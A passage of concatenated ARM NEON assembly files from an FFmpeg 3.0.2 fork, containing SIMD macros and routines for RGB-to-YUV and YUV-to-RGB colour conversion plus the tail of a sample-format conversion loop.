vst1.16 {d22}, [r8], r12
vsri.32 q3, q2, #16
vst1.16 {d19}, [r8], r12
vzip.32 d2, d6
vst1.16 {d23}, [r8], r12
vzip.32 d3, d7
beq 7f
vld1.32 {q8}, [r4,:128]!
vcvt.s32.f32 q8, q8, #31
vst1.16 {d2}, [r8], r12
vld1.32 {q9}, [r5,:128]!
vcvt.s32.f32 q9, q9, #31
vst1.16 {d6}, [r8], r12
vld1.32 {q10}, [r6,:128]!
vcvt.s32.f32 q10, q10, #31
vst1.16 {d3}, [r8], r12
vld1.32 {q11}, [r7,:128]!
vcvt.s32.f32 q11, q11, #31
vst1.16 {d7}, [r8], r12
b 6b
7: vst1.16 {d2}, [r8], r12
vst1.16 {d6}, [r8], r12
vst1.16 {d3}, [r8], r12
vst1.16 {d7}, [r8], r12
subs r3, r3, #4
it eq
popeq {r4-r8, pc}
cmp r3, #4
add r0, r0, #8
bge 5b
@ 2 channels
4: cmp r3, #2
blt 4f
ldm r1!, {r4-r5}
mov lr, r2
mov r8, r0
tst lr, #8
vld1.32 {q8}, [r4,:128]!
vcvt.s32.f32 q8, q8, #31
vld1.32 {q9}, [r5,:128]!
vcvt.s32.f32 q9, q9, #31
vld1.32 {q10}, [r4,:128]!
vcvt.s32.f32 q10, q10, #31
vld1.32 {q11}, [r5,:128]!
vcvt.s32.f32 q11, q11, #31
beq 6f
subs lr, lr, #8
beq 7f
vsri.32 d18, d16, #16
vsri.32 d19, d17, #16
vld1.32 {q8}, [r4,:128]!
vcvt.s32.f32 q8, q8, #31
vst1.32 {d18[0]}, [r8], r12
vsri.32 d22, d20, #16
vst1.32 {d18[1]}, [r8], r12
vsri.32 d23, d21, #16
vst1.32 {d19[0]}, [r8], r12
vst1.32 {d19[1]}, [r8], r12
vld1.32 {q9}, [r5,:128]!
vcvt.s32.f32 q9, q9, #31
vst1.32 {d22[0]}, [r8], r12
vst1.32 {d22[1]}, [r8], r12
vld1.32 {q10}, [r4,:128]!
vcvt.s32.f32 q10, q10, #31
vst1.32 {d23[0]}, [r8], r12
vst1.32 {d23[1]}, [r8], r12
vld1.32 {q11}, [r5,:128]!
vcvt.s32.f32 q11, q11, #31
6: subs lr, lr, #16
vld1.32 {q0}, [r4,:128]!
vcvt.s32.f32 q0, q0, #31
vsri.32 d18, d16, #16
vld1.32 {q1}, [r5,:128]!
vcvt.s32.f32 q1, q1, #31
vsri.32 d19, d17, #16
vld1.32 {q2}, [r4,:128]!
vcvt.s32.f32 q2, q2, #31
vld1.32 {q3}, [r5,:128]!
vcvt.s32.f32 q3, q3, #31
vst1.32 {d18[0]}, [r8], r12
vsri.32 d22, d20, #16
vst1.32 {d18[1]}, [r8], r12
vsri.32 d23, d21, #16
vst1.32 {d19[0]}, [r8], r12
vsri.32 d2, d0, #16
vst1.32 {d19[1]}, [r8], r12
vsri.32 d3, d1, #16
vst1.32 {d22[0]}, [r8], r12
vsri.32 d6, d4, #16
vst1.32 {d22[1]}, [r8], r12
vsri.32 d7, d5, #16
vst1.32 {d23[0]}, [r8], r12
vst1.32 {d23[1]}, [r8], r12
beq 6f
vld1.32 {q8}, [r4,:128]!
vcvt.s32.f32 q8, q8, #31
vst1.32 {d2[0]}, [r8], r12
vst1.32 {d2[1]}, [r8], r12
vld1.32 {q9}, [r5,:128]!
vcvt.s32.f32 q9, q9, #31
vst1.32 {d3[0]}, [r8], r12
vst1.32 {d3[1]}, [r8], r12
vld1.32 {q10}, [r4,:128]!
vcvt.s32.f32 q10, q10, #31
vst1.32 {d6[0]}, [r8], r12
vst1.32 {d6[1]}, [r8], r12
vld1.32 {q11}, [r5,:128]!
vcvt.s32.f32 q11, q11, #31
vst1.32 {d7[0]}, [r8], r12
vst1.32 {d7[1]}, [r8], r12
bgt 6b
6: vst1.32 {d2[0]}, [r8], r12
vst1.32 {d2[1]}, [r8], r12
vst1.32 {d3[0]}, [r8], r12
vst1.32 {d3[1]}, [r8], r12
vst1.32 {d6[0]}, [r8], r12
vst1.32 {d6[1]}, [r8], r12
vst1.32 {d7[0]}, [r8], r12
vst1.32 {d7[1]}, [r8], r12
b 8f
7: vsri.32 d18, d16, #16
vsri.32 d19, d17, #16
vst1.32 {d18[0]}, [r8], r12
vsri.32 d22, d20, #16
vst1.32 {d18[1]}, [r8], r12
vsri.32 d23, d21, #16
vst1.32 {d19[0]}, [r8], r12
vst1.32 {d19[1]}, [r8], r12
vst1.32 {d22[0]}, [r8], r12
vst1.32 {d22[1]}, [r8], r12
vst1.32 {d23[0]}, [r8], r12
vst1.32 {d23[1]}, [r8], r12
8: subs r3, r3, #2
add r0, r0, #4
it eq
popeq {r4-r8, pc}
@ 1 channel
4: ldr r4, [r1]
tst r2, #8
mov lr, r2
mov r5, r0
vld1.32 {q0}, [r4,:128]!
vcvt.s32.f32 q0, q0, #31
vld1.32 {q1}, [r4,:128]!
vcvt.s32.f32 q1, q1, #31
bne 8f
6: subs lr, lr, #16
vld1.32 {q2}, [r4,:128]!
vcvt.s32.f32 q2, q2, #31
vld1.32 {q3}, [r4,:128]!
vcvt.s32.f32 q3, q3, #31
vst1.16 {d0[1]}, [r5,:16], r12
vst1.16 {d0[3]}, [r5,:16], r12
vst1.16 {d1[1]}, [r5,:16], r12
vst1.16 {d1[3]}, [r5,:16], r12
vst1.16 {d2[1]}, [r5,:16], r12
vst1.16 {d2[3]}, [r5,:16], r12
vst1.16 {d3[1]}, [r5,:16], r12
vst1.16 {d3[3]}, [r5,:16], r12
beq 7f
vld1.32 {q0}, [r4,:128]!
vcvt.s32.f32 q0, q0, #31
vld1.32 {q1}, [r4,:128]!
vcvt.s32.f32 q1, q1, #31
7: vst1.16 {d4[1]}, [r5,:16], r12
vst1.16 {d4[3]}, [r5,:16], r12
vst1.16 {d5[1]}, [r5,:16], r12
vst1.16 {d5[3]}, [r5,:16], r12
vst1.16 {d6[1]}, [r5,:16], r12
vst1.16 {d6[3]}, [r5,:16], r12
vst1.16 {d7[1]}, [r5,:16], r12
vst1.16 {d7[3]}, [r5,:16], r12
bgt 6b
pop {r4-r8, pc}
8: subs lr, lr, #8
vst1.16 {d0[1]}, [r5,:16], r12
vst1.16 {d0[3]}, [r5,:16], r12
vst1.16 {d1[1]}, [r5,:16], r12
vst1.16 {d1[3]}, [r5,:16], r12
vst1.16 {d2[1]}, [r5,:16], r12
vst1.16 {d2[3]}, [r5,:16], r12
vst1.16 {d3[1]}, [r5,:16], r12
vst1.16 {d3[3]}, [r5,:16], r12
it eq
popeq {r4-r8, pc}
vld1.32 {q0}, [r4,:128]!
vcvt.s32.f32 q0, q0, #31
vld1.32 {q1}, [r4,:128]!
vcvt.s32.f32 q1, q1, #31
b 6b
endfunc
|
Akagi201/ffmpeg-xcode
| 2,242
|
ffmpeg-3.0.2/libswscale/arm/rgb2yuv_neon_16.S
|
/*
* Copyright (C) 2013 Xiaolei Yu <dreifachstein@gmail.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "rgb2yuv_neon_common.S"
/* downsampled R16G16B16 x8 */
alias_qw r16x8, q7
alias_qw g16x8, q8
alias_qw b16x8, q9
alias n16x16_l, q11
alias n16x16_h, q12
alias y16x16_l, q13
alias y16x16_h, q14
alias_qw y8x16, q15
.macro init src
vld3.i32 {q13_l, q14_l, q15_l}, [\src]!
vld3.i32 {q13_h[0], q14_h[0], q15_h[0]}, [\src]
vrshrn.i32 CO_R, q13, #7
vrshrn.i32 CO_G, q14, #7
vrshrn.i32 CO_B, q15, #7
vmov.u8 BIAS_Y, #16
vmov.u8 BIAS_U, #128
.endm
.macro compute_y_16x1_step action, s8x16, coeff
vmovl.u8 n16x16_l, \s8x16\()_l
vmovl.u8 n16x16_h, \s8x16\()_h
\action y16x16_l, n16x16_l, \coeff
\action y16x16_h, n16x16_h, \coeff
.endm
.macro compute_y_16x1
compute_y_16x1_step vmul, r8x16, CO_RY
compute_y_16x1_step vmla, g8x16, CO_GY
compute_y_16x1_step vmla, b8x16, CO_BY
vrshrn.i16 y8x16_l, y16x16_l, #8
vrshrn.i16 y8x16_h, y16x16_h, #8
vadd.u8 y8x16, y8x16, BIAS_Y
.endm
alias c16x8, q15
alias_qw c8x8x2, q10
.macro compute_chroma_8x1 c, C
vmul c16x8, r16x8, CO_R\C
vmla c16x8, g16x8, CO_G\C
vmla c16x8, b16x8, CO_B\C
vrshrn.i16 \c\()8x8, c16x8, #8
vadd.u8 \c\()8x8, \c\()8x8, BIAS_\C
.endm
loop_420sp rgbx, nv12, init, kernel_420_16x2, 16
|
Akagi201/ffmpeg-xcode
| 3,230
|
ffmpeg-3.0.2/libswscale/arm/rgb2yuv_neon_32.S
|
/*
* Copyright (C) 2013 Xiaolei Yu <dreifachstein@gmail.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "rgb2yuv_neon_common.S"
/* downsampled R16G16B16 x8 */
alias_qw r16x8, q7
alias_qw g16x8, q8
alias_qw b16x8, q9
alias n16x16_o, q11
alias n16x16_ol, q11_l
alias n16x16_oh, q11_h
alias y32x16_el, q12
alias y32x16_eh, q13
alias y32x16_ol, q14
alias y32x16_oh, q15
alias y16x16_e, q12
alias y16x16_el, q12_l
alias y16x16_eh, q12_h
alias y16x16_o, q13
alias y16x16_ol, q13_l
alias y16x16_oh, q13_h
alias y8x16, y16x16_e
.macro init src
// load s32x3x3, narrow to s16x3x3
vld3.i32 {q13_l, q14_l, q15_l}, [\src]!
vld3.i32 {q13_h[0], q14_h[0], q15_h[0]}, [\src]
vmovn.i32 CO_R, q13
vmovn.i32 CO_G, q14
vmovn.i32 CO_B, q15
vmov.u8 BIAS_Y, #16
vmov.u8 BIAS_U, #128
.endm
.macro compute_y_16x1_step action, s8x16, coeff
vmov.u8 n16x16_o, #0
vtrn.u8 \s8x16, n16x16_o
\action y32x16_el, \s8x16\()_l, \coeff
\action y32x16_eh, \s8x16\()_h, \coeff
\action y32x16_ol, n16x16_ol, \coeff
\action y32x16_oh, n16x16_oh, \coeff
.endm
/*
* in: r8x16, g8x16, b8x16
* out: y8x16
* clobber: q11-q15, r8x16, g8x16, b8x16
*/
.macro compute_y_16x1
compute_y_16x1_step vmull, r8x16, CO_RY
compute_y_16x1_step vmlal, g8x16, CO_GY
compute_y_16x1_step vmlal, b8x16, CO_BY
vrshrn.i32 y16x16_el, y32x16_el, #15
vrshrn.i32 y16x16_eh, y32x16_eh, #15
vrshrn.i32 y16x16_ol, y32x16_ol, #15
vrshrn.i32 y16x16_oh, y32x16_oh, #15
vtrn.8 y16x16_e, y16x16_o
vadd.u8 y8x16, y8x16, BIAS_Y
.endm
alias c32x8_l, q14
alias c32x8_h, q15
alias_qw c16x8, q13
alias_qw c8x8x2, q10
.macro compute_chroma_8x1_step action, s16x8, coeff
\action c32x8_l, \s16x8\()_l, \coeff
\action c32x8_h, \s16x8\()_h, \coeff
.endm
/*
* in: r16x8, g16x8, b16x8
* out: c8x8
* clobber: q14-q15
*/
.macro compute_chroma_8x1 c, C
compute_chroma_8x1_step vmull, r16x8, CO_R\C
compute_chroma_8x1_step vmlal, g16x8, CO_G\C
compute_chroma_8x1_step vmlal, b16x8, CO_B\C
vrshrn.i32 c16x8_l, c32x8_l, #15
vrshrn.i32 c16x8_h, c32x8_h, #15
vmovn.i16 \c\()8x8, c16x8
vadd.u8 \c\()8x8, \c\()8x8, BIAS_\C
.endm
loop_420sp rgbx, nv12, init, kernel_420_16x2, 32
|
Akagi201/ffmpeg-xcode
| 6,921
|
ffmpeg-3.0.2/libswscale/arm/rgb2yuv_neon_common.S
|
/*
* Copyright (C) 2013 Xiaolei Yu <dreifachstein@gmail.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
.macro alias name, tgt, set=1
.if \set != 0
\name .req \tgt
.else
.unreq \name
.endif
.endm
.altmacro
.macro alias_dw_all qw, dw_l, dw_h
alias q\qw\()_l, d\dw_l
alias q\qw\()_h, d\dw_h
.if \qw < 15
alias_dw_all %(\qw + 1), %(\dw_l + 2), %(\dw_h + 2)
.endif
.endm
alias_dw_all 0, 0, 1
.noaltmacro
.macro alias_qw name, qw, set=1
alias \name\(), \qw, \set
alias \name\()_l, \qw\()_l, \set
alias \name\()_h, \qw\()_h, \set
.endm
.macro prologue
push {r4-r12, lr}
vpush {q4-q7}
.endm
.macro epilogue
vpop {q4-q7}
pop {r4-r12, pc}
.endm
.macro load_arg reg, ix
ldr \reg, [sp, #((10 * 4 + 4 * 16) + (\ix - 4) * 4)]
.endm
/* ()_to_()_neon(const uint8_t *src, uint8_t *y, uint8_t *chroma
* int width, int height,
* int y_stride, int c_stride, int src_stride,
* int32_t coeff_table[9]);
*/
.macro alias_loop_420sp set=1
alias src, r0, \set
alias src0, src, \set
alias y, r1, \set
alias y0, y, \set
alias chroma, r2, \set
alias width, r3, \set
alias header, width, \set
alias height, r4, \set
alias y_stride, r5, \set
alias c_stride, r6, \set
alias c_padding, c_stride, \set
alias src_stride, r7, \set
alias y0_end, r8, \set
alias src_padding,r9, \set
alias y_padding, r10, \set
alias src1, r11, \set
alias y1, r12, \set
alias coeff_table,r12, \set
.endm
.macro loop_420sp s_fmt, d_fmt, init, kernel, precision
function \s_fmt\()_to_\d_fmt\()_neon_\precision, export=1
prologue
alias_loop_420sp
load_arg height, 4
load_arg y_stride, 5
load_arg c_stride, 6
load_arg src_stride, 7
load_arg coeff_table, 8
\init coeff_table
sub y_padding, y_stride, width
sub c_padding, c_stride, width
sub src_padding, src_stride, width, LSL #2
add y0_end, y0, width
and header, width, #15
add y1, y0, y_stride
add src1, src0, src_stride
0:
cmp header, #0
beq 1f
\kernel \s_fmt, \d_fmt, src0, src1, y0, y1, chroma, header
1:
\kernel \s_fmt, \d_fmt, src0, src1, y0, y1, chroma
cmp y0, y0_end
blt 1b
2:
add y0, y1, y_padding
add y0_end, y1, y_stride
add chroma, chroma, c_padding
add src0, src1, src_padding
add y1, y0, y_stride
add src1, src0, src_stride
subs height, height, #2
bgt 0b
epilogue
alias_loop_420sp 0
endfunc
.endm
.macro downsample
vpaddl.u8 r16x8, r8x16
vpaddl.u8 g16x8, g8x16
vpaddl.u8 b16x8, b8x16
.endm
/* acculumate and right shift by 2 */
.macro downsample_ars2
vpadal.u8 r16x8, r8x16
vpadal.u8 g16x8, g8x16
vpadal.u8 b16x8, b8x16
vrshr.u16 r16x8, r16x8, #2
vrshr.u16 g16x8, g16x8, #2
vrshr.u16 b16x8, b16x8, #2
.endm
.macro store_y8_16x1 dst, count
.ifc "\count",""
vstmia \dst!, {y8x16}
.else
vstmia \dst, {y8x16}
add \dst, \dst, \count
.endif
.endm
.macro store_chroma_nv12_8x1 dst, count
.ifc "\count",""
vst2.i8 {u8x8, v8x8}, [\dst]!
.else
vst2.i8 {u8x8, v8x8}, [\dst], \count
.endif
.endm
.macro store_chroma_nv21_8x1 dst, count
.ifc "\count",""
vst2.i8 {v8x8, u8x8}, [\dst]!
.else
vst2.i8 {v8x8, u8x8}, [\dst], \count
.endif
.endm
.macro load_8888_16x1 a, b, c, d, src, count
.ifc "\count",""
vld4.8 {\a\()8x16_l, \b\()8x16_l, \c\()8x16_l, \d\()8x16_l}, [\src]!
vld4.8 {\a\()8x16_h, \b\()8x16_h, \c\()8x16_h, \d\()8x16_h}, [\src]!
.else
vld4.8 {\a\()8x16_l, \b\()8x16_l, \c\()8x16_l, \d\()8x16_l}, [\src]!
vld4.8 {\a\()8x16_h, \b\()8x16_h, \c\()8x16_h, \d\()8x16_h}, [\src]
sub \src, \src, #32
add \src, \src, \count, LSL #2
.endif
.endm
.macro load_rgbx_16x1 src, count
load_8888_16x1 r, g, b, x, \src, \count
.endm
.macro load_bgrx_16x1 src, count
load_8888_16x1 b, g, r, x, \src, \count
.endm
.macro alias_src_rgbx set=1
alias_src_8888 r, g, b, x, \set
.endm
.macro alias_src_bgrx set=1
alias_src_8888 b, g, r, x, \set
.endm
.macro alias_dst_nv12 set=1
alias u8x8, c8x8x2_l, \set
alias v8x8, c8x8x2_h, \set
.endm
.macro alias_dst_nv21 set=1
alias v8x8, c8x8x2_l, \set
alias u8x8, c8x8x2_h, \set
.endm
// common aliases
alias CO_R d0
CO_RY .dn d0.s16[0]
CO_RU .dn d0.s16[1]
CO_RV .dn d0.s16[2]
alias CO_G d1
CO_GY .dn d1.s16[0]
CO_GU .dn d1.s16[1]
CO_GV .dn d1.s16[2]
alias CO_B d2
CO_BY .dn d2.s16[0]
CO_BU .dn d2.s16[1]
CO_BV .dn d2.s16[2]
alias BIAS_U, d3
alias BIAS_V, BIAS_U
alias BIAS_Y, q2
/* q3-q6 R8G8B8X8 x16 */
.macro alias_src_8888 a, b, c, d, set
alias_qw \a\()8x16, q3, \set
alias_qw \b\()8x16, q4, \set
alias_qw \c\()8x16, q5, \set
alias_qw \d\()8x16, q6, \set
.endm
.macro kernel_420_16x2 rgb_fmt, yuv_fmt, rgb0, rgb1, y0, y1, chroma, count
alias_src_\rgb_fmt
alias_dst_\yuv_fmt
load_\rgb_fmt\()_16x1 \rgb0, \count
downsample
compute_y_16x1
store_y8_16x1 \y0, \count
load_\rgb_fmt\()_16x1 \rgb1, \count
downsample_ars2
compute_y_16x1
store_y8_16x1 \y1, \count
compute_chroma_8x1 u, U
compute_chroma_8x1 v, V
store_chroma_\yuv_fmt\()_8x1 \chroma, \count
alias_dst_\yuv_fmt 0
alias_src_\rgb_fmt 0
.endm
|
Akagi201/ffmpeg-xcode
| 18,411
|
ffmpeg-3.0.2/libswscale/arm/yuv2rgb_neon.S
|
/*
* Copyright (c) 2015 Matthieu Bouron <matthieu.bouron stupeflix.com>
* Copyright (c) 2015 Clément Bœsch <clement stupeflix.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
.macro compute_premult_16 half_u1, half_u2, half_v1, half_v2
vmov d2, \half_u1 @ copy left q14 to left q1
vmov d3, \half_u1 @ copy left q14 to right q1
vmov d4, \half_u2 @ copy right q14 to left q2
vmov d5, \half_u2 @ copy right q14 to right q2
vmov d6, \half_v1 @ copy left q15 to left q3
vmov d7, \half_v1 @ copy left q15 to right q3
vmov d8, \half_v2 @ copy right q15 to left q4
vmov d9, \half_v2 @ copy right q15 to right q4
vzip.16 d2, d3 @ U1U1U2U2U3U3U4U4
vzip.16 d4, d5 @ U5U5U6U6U7U7U8U8
vzip.16 d6, d7 @ V1V1V2V2V3V3V4V4
vzip.16 d8, d9 @ V5V5V6V6V7V7V8V8
vmul.s16 q8, q3, d1[0] @ V * v2r (left, red)
vmul.s16 q9, q4, d1[0] @ V * v2r (right, red)
vmul.s16 q10, q1, d1[1] @ U * u2g
vmul.s16 q11, q2, d1[1] @ U * u2g
vmla.s16 q10, q3, d1[2] @ U * u2g + V * v2g (left, green)
vmla.s16 q11, q4, d1[2] @ U * u2g + V * v2g (right, green)
vmul.s16 q12, q1, d1[3] @ U * u2b (left, blue)
vmul.s16 q13, q2, d1[3] @ U * u2b (right, blue)
.endm
.macro compute_premult_32 half_u half_v
vmov d2, \half_u @ copy left q14 to left q1
vmov d3, \half_u @ copy left q14 to right q1
vmov d4, \half_v @ copy left q15 to left q2
vmov d5, \half_v @ copy left q15 to right q2
vzip.16 d2, d3 @ U1U1U2U2U3U3U4U4
vzip.16 d4, d5 @ V1V1V2V2V3V3V4V4
vmull.s16 q8, d4, d1[0] @ V * v2r (left, red)
vmull.s16 q9, d5, d1[0] @ V * v2r (right, red)
vmull.s16 q10, d2, d1[1] @ U * u2g
vmull.s16 q11, d3, d1[1] @ U * u2g
vmlal.s16 q10, d4, d1[2] @ U * u2g + V * v2g (left, green)
vmlal.s16 q11, d5, d1[2] @ U * u2g + V * v2g (right, green)
vmull.s16 q12, d2, d1[3] @ U * u2b (left, blue)
vmull.s16 q13, d3, d1[3] @ U * u2b (right, blue)
.endm
.macro compute_color_16 dst_comp1 dst_comp2 pre1 pre2
vadd.s16 q1, q14, \pre1
vadd.s16 q2, q15, \pre2
vqrshrun.s16 \dst_comp1, q1, #6
vqrshrun.s16 \dst_comp2, q2, #6
.endm
.macro compute_color_32 dst_comp pre1 pre2
vadd.s32 q3, q1, \pre1
vadd.s32 q4, q2, \pre2
vqrshrun.s32 d10, q3, #13
vqrshrun.s32 d11, q4, #13 @ q5 = ({q3,q4} + (1<<12)) >> 13
vqmovn.u16 \dst_comp, q5 @ saturate 16bit -> 8bit
.endm
.macro compute_rgba_16 r1 r2 g1 g2 b1 b2 a1 a2
compute_color_16 \r1, \r2, q8, q9
compute_color_16 \g1, \g2, q10, q11
compute_color_16 \b1, \b2, q12, q13
vmov.u8 \a1, #255
vmov.u8 \a2, #255
.endm
.macro compute_rgba_32 r g b a
compute_color_32 \r, q8, q9
compute_color_32 \g, q10, q11
compute_color_32 \b, q12, q13
vmov.u8 \a, #255
.endm
.macro compute_16px_16 dst y0 y1 ofmt
vmovl.u8 q14, \y0 @ 8px of y
vmovl.u8 q15, \y1 @ 8px of y
vdup.16 q5, r9 @ q5 = y_offset
vmov d14, d0 @ q7 = y_coeff
vmov d15, d0 @ q7 = y_coeff
vsub.s16 q14, q5
vsub.s16 q15, q5
vmul.s16 q14, q7 @ q14 = (srcY - y_offset) * y_coeff (left)
vmul.s16 q15, q7 @ q15 = (srcY - y_offset) * y_coeff (right)
.ifc \ofmt,argb
compute_rgba_16 d7, d11, d8, d12, d9, d13, d6, d10
.endif
.ifc \ofmt,rgba
compute_rgba_16 d6, d10, d7, d11, d8, d12, d9, d13
.endif
.ifc \ofmt,abgr
compute_rgba_16 d9, d13, d8, d12, d7, d11, d6, d10
.endif
.ifc \ofmt,bgra
compute_rgba_16 d8, d12, d7, d11, d6, d10, d9, d13
.endif
vst4.8 {q3, q4}, [\dst,:128]!
vst4.8 {q5, q6}, [\dst,:128]!
.endm
.macro compute_8px_32 dst half_y ofmt
vmovl.u8 q7, \half_y @ 8px of Y
vdup.16 q5, r9
vsub.s16 q7, q5
vmull.s16 q1, d14, d0 @ q1 = (srcY - y_offset) * y_coeff (left)
vmull.s16 q2, d15, d0 @ q2 = (srcY - y_offset) * y_coeff (right)
.ifc \ofmt,argb
compute_rgba_32 d13, d14, d15, d12
.endif
.ifc \ofmt,rgba
compute_rgba_32 d12, d13, d14, d15
.endif
.ifc \ofmt,abgr
compute_rgba_32 d15, d14, d13, d12
.endif
.ifc \ofmt,bgra
compute_rgba_32 d14, d13, d12, d15
.endif
vst4.8 {q6, q7}, [\dst,:128]!
.endm
.macro process_1l_16px_16 ofmt
compute_premult_16 d28, d29, d30, d31
vld1.8 {q7}, [r4]!
compute_16px_16 r2, d14, d15, \ofmt
.endm
.macro process_1l_16px_32 ofmt
compute_premult_32 d28, d30
vld1.8 {q7}, [r4]!
vmov d28, d15 @ save right of the line of luma for later use
compute_8px_32 r2, d14, \ofmt
compute_premult_32 d29, d31
compute_8px_32 r2, d28, \ofmt
.endm
.macro process_2l_16px_16 ofmt
compute_premult_16 d28, d29, d30, d31
vld1.8 {q7}, [r4]! @ first line of luma
compute_16px_16 r2, d14, d15, \ofmt
vld1.8 {q7}, [r12]! @ second line of luma
compute_16px_16 r11, d14, d15, \ofmt
.endm
.macro process_2l_16px_32 ofmt
compute_premult_32 d28, d30
vld1.8 {q7}, [r4]! @ first line of luma
vmov d28, d15 @ save right of the first line of luma for later use
compute_8px_32 r2, d14, \ofmt
vld1.8 {q7}, [r12]! @ second line of luma
vmov d30, d15 @ save right of the second line of luma for later use
compute_8px_32 r11, d14, \ofmt
compute_premult_32 d29, d31
compute_8px_32 r2, d28, \ofmt
compute_8px_32 r11, d30, \ofmt
.endm
.macro load_args_nvx
push {r4-r12, lr}
vpush {q4-q7}
ldr r4, [sp, #104] @ r4 = srcY
ldr r5, [sp, #108] @ r5 = linesizeY
ldr r6, [sp, #112] @ r6 = srcC
ldr r7, [sp, #116] @ r7 = linesizeC
ldr r8, [sp, #120] @ r8 = table
ldr r9, [sp, #124] @ r9 = y_offset
ldr r10,[sp, #128] @ r10 = y_coeff
vdup.16 d0, r10 @ d0 = y_coeff
vld1.16 {d1}, [r8] @ d1 = *table
add r11, r2, r3 @ r11 = dst + linesize (dst2)
add r12, r4, r5 @ r12 = srcY + linesizeY (srcY2)
lsl r3, r3, #1
lsl r5, r5, #1
lsl r8, r0, #2
sub r3, r3, r8 @ r3 = linesize * 2 - width * 4 (padding)
sub r5, r5, r0 @ r5 = linesizeY * 2 - width (paddingY)
sub r7, r7, r0 @ r7 = linesizeC - width (paddingC)
.endm
.macro load_args_yuv420p
push {r4-r12, lr}
vpush {q4-q7}
ldr r4, [sp, #104] @ r4 = srcY
ldr r5, [sp, #108] @ r5 = linesizeY
ldr r6, [sp, #112] @ r6 = srcU
ldr r8, [sp, #128] @ r8 = table
ldr r9, [sp, #132] @ r9 = y_offset
ldr r10,[sp, #136] @ r10 = y_coeff
vdup.16 d0, r10 @ d0 = y_coeff
vld1.16 {d1}, [r8] @ d1 = *table
add r11, r2, r3 @ r11 = dst + linesize (dst2)
add r12, r4, r5 @ r12 = srcY + linesizeY (srcY2)
lsl r3, r3, #1
lsl r5, r5, #1
lsl r8, r0, #2
sub r3, r3, r8 @ r3 = linesize * 2 - width * 4 (padding)
sub r5, r5, r0 @ r5 = linesizeY * 2 - width (paddingY)
ldr r10,[sp, #120] @ r10 = srcV
.endm
.macro load_args_yuv422p
push {r4-r12, lr}
vpush {q4-q7}
ldr r4, [sp, #104] @ r4 = srcY
ldr r5, [sp, #108] @ r5 = linesizeY
ldr r6, [sp, #112] @ r6 = srcU
ldr r7, [sp, #116] @ r7 = linesizeU
ldr r12,[sp, #124] @ r12 = linesizeV
ldr r8, [sp, #128] @ r8 = table
ldr r9, [sp, #132] @ r9 = y_offset
ldr r10,[sp, #136] @ r10 = y_coeff
vdup.16 d0, r10 @ d0 = y_coeff
vld1.16 {d1}, [r8] @ d1 = *table
add r11, r2, r3 @ r11 = dst + linesize (dst2)
lsl r8, r0, #2
sub r3, r3, r8 @ r3 = linesize * 2 - width * 4 (padding)
sub r5, r5, r0 @ r5 = linesizeY * 2 - width (paddingY)
sub r7, r7, r0, lsr #1 @ r7 = linesizeU - width / 2 (paddingU)
sub r12,r12,r0, lsr #1 @ r12 = linesizeV - width / 2 (paddingV)
ldr r10,[sp, #120] @ r10 = srcV
.endm
.macro declare_func ifmt ofmt precision
function ff_\ifmt\()_to_\ofmt\()_neon_\precision\(), export=1
.ifc \ifmt,nv12
load_args_nvx
.endif
.ifc \ifmt,nv21
load_args_nvx
.endif
.ifc \ifmt,yuv420p
load_args_yuv420p
.endif
.ifc \ifmt,yuv422p
load_args_yuv422p
.endif
1:
mov r8, r0 @ r8 = width
2:
pld [r6, #64*3]
pld [r4, #64*3]
vmov.i8 d10, #128
.ifc \ifmt,nv12
pld [r12, #64*3]
vld2.8 {d2, d3}, [r6]! @ q1: interleaved chroma line
vsubl.u8 q14, d2, d10 @ q14 = U - 128
vsubl.u8 q15, d3, d10 @ q15 = V - 128
process_2l_16px_\precision \ofmt
.endif
.ifc \ifmt,nv21
pld [r12, #64*3]
vld2.8 {d2, d3}, [r6]! @ q1: interleaved chroma line
vsubl.u8 q14, d3, d10 @ q14 = U - 128
vsubl.u8 q15, d2, d10 @ q15 = V - 128
process_2l_16px_\precision \ofmt
.endif
.ifc \ifmt,yuv420p
pld [r10, #64*3]
pld [r12, #64*3]
vld1.8 d2, [r6]! @ d2: chroma red line
vld1.8 d3, [r10]! @ d3: chroma blue line
vsubl.u8 q14, d2, d10 @ q14 = U - 128
vsubl.u8 q15, d3, d10 @ q15 = V - 128
